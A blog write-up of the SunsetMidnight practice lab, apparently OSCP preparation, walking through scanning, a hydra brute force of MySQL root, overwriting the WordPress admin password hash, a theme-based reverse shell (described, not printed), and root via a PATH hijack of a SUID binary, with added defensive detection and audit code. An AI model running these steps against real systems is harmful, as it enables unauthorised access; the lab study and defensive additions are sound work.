OSCP-PG-SunsetMidnight

Mkd1R 2022-5-24

#Enumeration

-nmap

# nmap -vvv 192.168.57.88
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 63
80/tcp   open  http    syn-ack ttl 63
3306/tcp open  mysql   syn-ack ttl 63

-nmap2

# nmap -p22,80,3306 -A 192.168.57.88
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Did not follow redirect to http://sunset-midnight/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 16
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolNew, LongColumnFlag, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, InteractiveClient, Support41Auth, Speaks41ProtocolOld, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: )P9h%yX+kZb]-g@H*6oP
|_  Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 4.15 - 5.6 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 - 3.12 (90%), Linux 3.4 (90%), Linux 3.7 (90%), Linux 4.4 (90%), Synology DiskStation Manager 5.1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#Web enumeration | WordPress

# gobuster dir -u http://192.168.57.88 -t 20 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.json       (Status: 403) [Size: 278]
/!                    (Status: 301) [Size: 0] [--> http://192.168.57.88/]
/.htpasswd.php        (Status: 403) [Size: 278]                          
/.htaccess.php        (Status: 403) [Size: 278]                          
/.htpasswd.html       (Status: 403) [Size: 278]                          
/.htaccess.html       (Status: 403) [Size: 278]                          
/.htpasswd.txt        (Status: 403) [Size: 278]                          
/.htaccess            (Status: 403) [Size: 278]                          
/.htaccess.txt        (Status: 403) [Size: 278]                          
/.htpasswd.json       (Status: 403) [Size: 278]                          
/0000                 (Status: 301) [Size: 0] [--> http://192.168.57.88/0000/]
/0                    (Status: 200) [Size: 61796]                             
/2020                 (Status: 301) [Size: 0] [--> http://192.168.57.88/2020/]
/About                (Status: 301) [Size: 0] [--> http://192.168.57.88/About/]
/Blog                 (Status: 301) [Size: 0] [--> http://192.168.57.88/Blog/] 
/Contact              (Status: 301) [Size: 0] [--> http://192.168.57.88/Contact/]
/Home                 (Status: 200) [Size: 61796]                                
/about                (Status: 301) [Size: 0] [--> http://192.168.57.88/about/]  
/admin                (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-admin/]                                                                                                                                                        
/asdfjkl;             (Status: 301) [Size: 0] [--> http://192.168.57.88/asdfjkl]                                                                                                                                                            
/atom                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/atom/]                                                                                                                                                         
/blog                 (Status: 301) [Size: 0] [--> http://192.168.57.88/blog/]                                                                                                                                                              
/coffee               (Status: 301) [Size: 0] [--> http://192.168.57.88/coffee/]    
/comment-page-1       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-3       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-4       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-5       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-6       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-2       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/contact              (Status: 301) [Size: 0] [--> http://192.168.57.88/contact/]   
/dashboard            (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-admin/]
/embed                (Status: 200) [Size: 18968]                                   
/favicon.ico          (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-includes/images/w-logo-blue-white-bg.png]
/feed                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/fixed!               (Status: 301) [Size: 0] [--> http://192.168.57.88/fixed]                                        
/home                 (Status: 200) [Size: 61796]                                                                     
/index.php            (Status: 200) [Size: 61796]                                                                     
/license.txt          (Status: 200) [Size: 19915]                                                                     
/login                (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-login.php]                               
/page1                (Status: 200) [Size: 61796]                                                                     
/rdf                  (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/rdf/]                                    
/readme.html          (Status: 200) [Size: 7278]                                                                      
/robots.txt           (Status: 200) [Size: 67]                                                                        
/rss                  (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/rss2                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/sample-page          (Status: 301) [Size: 0] [--> http://192.168.57.88/sample-page/]                                 
Progress: 78960 / 102350 (77.15%)                                                                                    [ERROR] 2022/05/24 15:02:46 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
/server-status        (Status: 403) [Size: 278]                                                                       
/workfiles.html       (Status: 500) [Size: 2836]                                                                      
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.57.88/wp-admin/]                                  
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.57.88/wp-content/]                                
/wp-feed.php          (Status: 301) [Size: 0] [--> http://sunset-midnight/feed/]                                      
/wp-config.php        (Status: 200) [Size: 0]                                                                         
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.57.88/wp-includes/]                               
/wp-rss2.php          (Status: 301) [Size: 0] [--> http://sunset-midnight/feed/]                                      
/wp-register.php      (Status: 301) [Size: 0] [--> http://sunset-midnight/wp-login.php?action=register]               
/wp-login.php         (Status: 200) [Size: 4922]                                                                      
/xmlrpc.php           (Status: 405) [Size: 42]                                                                        

#Exploitation

-hydra

# hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql -t 10
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-24 14:52:43
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://sunset-midnight:3306/
[3306][mysql] host: sunset-midnight   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
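Added example, not part of the original writeup: a detector for the brute-force attempt above, run over constructed MariaDB error-log lines. It assumes the server records failed logins (log_warnings >= 2); the timestamps, thread ids and the source IP 192.168.49.57 are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the MariaDB error-log format for failed logins;
# timestamps, thread ids and the source address are invented.
SAMPLE_LOG = """\
2022-05-24 14:52:43 12 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 14:52:43 13 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 14:52:44 14 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 14:52:44 15 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 14:52:45 16 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 14:52:45 17 [Warning] Access denied for user 'root'@'192.168.49.57' (using password: YES)
2022-05-24 15:10:02 40 [Warning] Access denied for user 'jose'@'10.0.0.5' (using password: YES)
2022-05-24 15:30:00 41 [Note] InnoDB: Buffer pool(s) load completed
"""

DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) +\d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']*)'"
)

def parse_denials(text):
    """Yield (timestamp, user, source) for every access-denied line."""
    for line in text.splitlines():
        m = DENIED.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["src"]

def find_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, source): total failures} for every pair that reaches
    `threshold` failed logins inside a sliding window of length `window`."""
    by_pair = defaultdict(list)
    for ts, user, src in parse_denials(text):
        by_pair[(user, src)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                hits[pair] = len(stamps)
                break
    return hits

if __name__ == "__main__":
    for (user, src), n in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force: {user}@{src} ({n} failures)")
```

A root account reachable on 3306 from the network is the other half of the problem; binding MariaDB to localhost removes this path entirely.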

-mysql

With the MySQL root account, reset the WordPress back-end user's password:

MariaDB [wordpress_db]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ |
+------------+------------------------------------+
1 row in set (0.290 sec)

MariaDB [wordpress_db]> update wp_users set user_pass="e10adc3949ba59abbe56e057f20f883e" where user_login='admin';
Query OK, 1 row affected (0.293 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [wordpress_db]> flush privileges;
Query OK, 0 rows affected (0.293 sec)

MariaDB [wordpress_db]> select user_login,user_pass from wp_users;
+------------+----------------------------------+
| user_login | user_pass                        |
+------------+----------------------------------+
| admin      | e10adc3949ba59abbe56e057f20f883e |
+------------+----------------------------------+
1 row in set (0.290 sec)
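Added example, not from the original post: why WordPress accepts the raw MD5 written by the UPDATE above, and an audit that flags such rows. It re-implements WordPress' classic wp_check_password() and the portable phpass ($P$) hash in Python; the rows and the editor password are constructed.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _encode64(data: bytes) -> str:
    """phpass' base64 variant: 24-bit little-endian groups, no padding."""
    out = ""
    for k in range(0, len(data), 3):
        chunk = data[k:k + 3]
        value = int.from_bytes(chunk, "little")
        for j in range(len(chunk) + 1):
            out += ITOA64[(value >> (6 * j)) & 0x3F]
    return out

def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass hash: setting is '$P$', one cost char and an 8-char salt."""
    rounds = 1 << ITOA64.index(setting[3])   # 'B' -> 2**13 MD5 rounds
    pw = password.encode()
    h = hashlib.md5(setting[4:12].encode() + pw).digest()
    for _ in range(rounds):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h)

def wp_check_password(password: str, stored: str) -> bool:
    """Classic WordPress wp_check_password(): a stored value of 32 chars or
    fewer is compared as a plain MD5, which is why the UPDATE above logs in."""
    if len(stored) <= 32:
        return hmac.compare_digest(stored, hashlib.md5(password.encode()).hexdigest())
    return stored.startswith("$P$") and hmac.compare_digest(stored, phpass_crypt(password, stored))

def audit_wp_users(rows):
    """Logins whose user_pass is not phpass-formatted; a raw MD5 in wp_users
    is a strong sign the column was rewritten directly in the database."""
    return [login for login, pw in rows if not pw.startswith("$P$")]

# Constructed rows: admin carries the MD5 from the UPDATE above, editor a
# phpass hash generated here using the salt from the original admin row.
SAMPLE_ROWS = [
    ("admin", "e10adc3949ba59abbe56e057f20f883e"),
    ("editor", phpass_crypt("correct horse", "$P$BaWk4oeAm")),
]
```

On the next successful login WordPress silently rehashes a legacy MD5 into phpass, so the audit only catches the tampering before that login happens.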

#Escalation

I first tried to get a reverse shell by editing 404.php directly, but that did not work. I then downloaded a fresh copy of the same theme, wrote the shell into its 404.php beforehand, and packed it as a zip:
https://wordpress.org/themes/twentyseventeen/

#Changing user

Afterwards I found the jose user's password in /var/www/html/wordpress/wp-config.php:

define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

With it I switched to the jose user.

#SUID

jose@midnight:/var/www/html/wordpress$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/status
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Of the SUID binaries, status can be used to escalate privileges:

jose@midnight:/var/www/html/wordpress$ cd /tmp

jose@midnight:/tmp$ touch service

jose@midnight:/tmp$ echo '/bin/sh' > service
jose@midnight:/tmp$ chmod 755 service

jose@midnight:/tmp$ export PATH=/tmp/:$PATH

jose@midnight:/tmp$ /usr/bin/status
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
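Added example, not part of the original writeup: what a setuid program like /usr/bin/status gets wrong when it runs a bare command name, and how to check for it. It mimics execvp()'s PATH walk in Python, stages a harmless lookalike named service in a scratch directory (constructed, standing in for /tmp above), and lists PATH entries a privileged program must not trust.

```python
import os
import stat
import tempfile

def resolve_like_execvp(command: str, path_env: str):
    """First executable named `command` found walking PATH left to right,
    which is what execvp()/system() do for a bare command name."""
    for entry in path_env.split(os.pathsep):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def unsafe_path_entries(path_env: str):
    """PATH entries a setuid program must not trust: empty or relative ones,
    and directories not owned by root or writable by group/other (/tmp's
    sticky bit does not stop anyone from creating a new file there)."""
    bad = []
    for entry in path_env.split(os.pathsep):
        if not entry or not os.path.isabs(entry):
            bad.append(entry)
            continue
        try:
            st = os.stat(entry)
        except OSError:
            continue
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            bad.append(entry)
    return bad

def demo():
    """Stage a harmless lookalike for `service` in a /tmp-like scratch dir and
    compare the lookup under a user-influenced PATH with a fixed one."""
    scratch = tempfile.mkdtemp()          # constructed stand-in for /tmp
    os.chmod(scratch, 0o1777)             # same mode as /tmp: world-writable, sticky
    lookalike = os.path.join(scratch, "service")
    with open(lookalike, "w") as f:
        f.write("#!/bin/sh\necho lookalike\n")
    os.chmod(lookalike, 0o755)
    trusted = "/usr/sbin:/usr/bin:/sbin:/bin"   # a hardened wrapper sets PATH itself
    return {
        "scratch": scratch,
        "hijacked": resolve_like_execvp("service", scratch + os.pathsep + trusted) == lookalike,
        "fixed_uses_lookalike": resolve_like_execvp("service", trusted) == lookalike,
        "unsafe": unsafe_path_entries(scratch + os.pathsep + ".:" + trusted),
    }
```

The same mistake is fixed either by calling /usr/sbin/service with its absolute path or by resetting PATH to a fixed root-owned list before any exec; a setuid binary that does neither is the finding to report.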
- THE END -

Last modified: 2022-07-02 21:56

Unless otherwise stated, all posts on this blog are the author's original work.